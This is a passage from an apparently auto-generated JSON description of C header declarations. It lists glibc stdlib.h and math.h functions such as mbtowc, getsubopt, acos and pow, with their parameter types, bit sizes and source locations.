"__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mblen", "ns": 0, "location": "/usr/include/stdlib.h:919:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mbtowc", "ns": 0, "location": "/usr/include/stdlib.h:922:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pwc", "type": { "tag": ":pointer", "type": { "tag": "wchar_t" } } }, { "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "wctomb", "ns": 0, "location": "/usr/include/stdlib.h:926:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__wchar", "type": { "tag": "wchar_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mbstowcs", "ns": 0, "location": "/usr/include/stdlib.h:930:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pwcs", "type": { "tag": ":pointer", "type": { "tag": "wchar_t" } } }, { "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "wcstombs", "ns": 0, "location": "/usr/include/stdlib.h:933:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__pwcs", "type": { "tag": ":pointer", "type": { "tag": "wchar_t" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "rpmatch", "ns": 0, "location": "/usr/include/stdlib.h:943:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__response", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getsubopt", "ns": 0, "location": "/usr/include/stdlib.h:954:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__optionp", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__tokens", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__valuep", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getloadavg", "ns": 0, "location": "/usr/include/stdlib.h:1000:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__loadavg", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__nelem", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "float_t", "location": "/usr/include/math.h:149:15", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "double_t", "location": "/usr/include/math.h:150:16", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fpclassify", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:21:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:21:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__signbit", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:25:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:25:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__isinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:30:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:30:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__finite", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:33:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:33:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__isnan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:36:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:36:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__iseqsig", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:39:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:39:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__issignaling", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:42:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:42:20>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "acos", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__acos", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:1 <Spelling=<scratch space>:61:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "asin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__asin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:1 <Spelling=<scratch space>:62:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "atan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__atan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:1 <Spelling=<scratch space>:63:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "atan2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__atan2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:1 <Spelling=<scratch space>:64:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "cos", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:17>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__cos", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:1 <Spelling=<scratch space>:66:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "sin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:17>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__sin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:1 <Spelling=<scratch space>:68:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "tan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__tan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:1 <Spelling=<scratch space>:69:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "cosh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__cosh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:1 <Spelling=<scratch space>:70:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "sinh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__sinh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:1 <Spelling=<scratch space>:71:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "tanh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__tanh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:1 <Spelling=<scratch space>:72:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "acosh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__acosh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:1 <Spelling=<scratch space>:73:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "asinh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__asinh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:1 <Spelling=<scratch space>:74:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "atanh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__atanh", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:1 <Spelling=<scratch space>:75:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "exp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:17>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__exp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:1 <Spelling=<scratch space>:77:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "frexp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__frexp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:1 <Spelling=<scratch space>:78:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "ldexp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__ldexp", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:1 <Spelling=<scratch space>:79:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "log", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:17>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__log", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:1 <Spelling=<scratch space>:81:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "log10", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__log10", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:1 <Spelling=<scratch space>:82:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "modf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__iptr", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__modf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:1 <Spelling=<scratch space>:83:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__iptr", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "expm1", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__expm1", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:1 <Spelling=<scratch space>:85:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "log1p", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__log1p", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:1 <Spelling=<scratch space>:86:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "logb", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__logb", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:1 <Spelling=<scratch space>:87:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "exp2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__exp2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:1 <Spelling=<scratch space>:88:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "log2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__log2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:1 <Spelling=<scratch space>:89:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "pow", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:17>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__pow", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:1 <Spelling=<scratch space>:91:1>", 